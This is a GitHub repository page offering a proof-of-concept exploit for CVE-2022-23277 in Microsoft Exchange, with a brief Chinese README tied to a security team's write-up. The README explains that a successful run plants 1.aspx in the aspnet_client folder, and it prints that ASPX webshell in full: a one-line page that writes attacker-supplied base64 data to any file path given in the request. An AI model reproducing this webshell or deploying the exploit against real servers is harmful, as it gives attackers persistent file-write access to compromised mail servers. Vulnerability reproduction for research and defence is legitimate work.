Skip to content
/ CVE-2022-23277 Public

CVE-2022-23277 POC to write a webshell to aspnet_client

9 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

7BitsTeam/CVE-2022-23277

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
images
images
 
 
ObjectDataProviderGenerator.cs
ObjectDataProviderGenerator.cs
 
 
README.md
README.md
 
 
cve-2022-23277.py
cve-2022-23277.py
 
 

Repository files navigation

exch_CVE-2021-42321

本文是7bits安全团队文章《DotNet安全-CVE-2022-23277漏洞复现》涉及到的工具

认证部分需要通过burpsuite手动添加,利用成功后会在aspnet_client写入1.aspx。

webshell:

<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>

利用详情可以参照我们的文章

欢迎关注我们的公众号 - Zbits2022

About

CVE-2022-23277 POC to write a webshell to aspnet_client

Resources

Readme
Activity

Stars

9 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages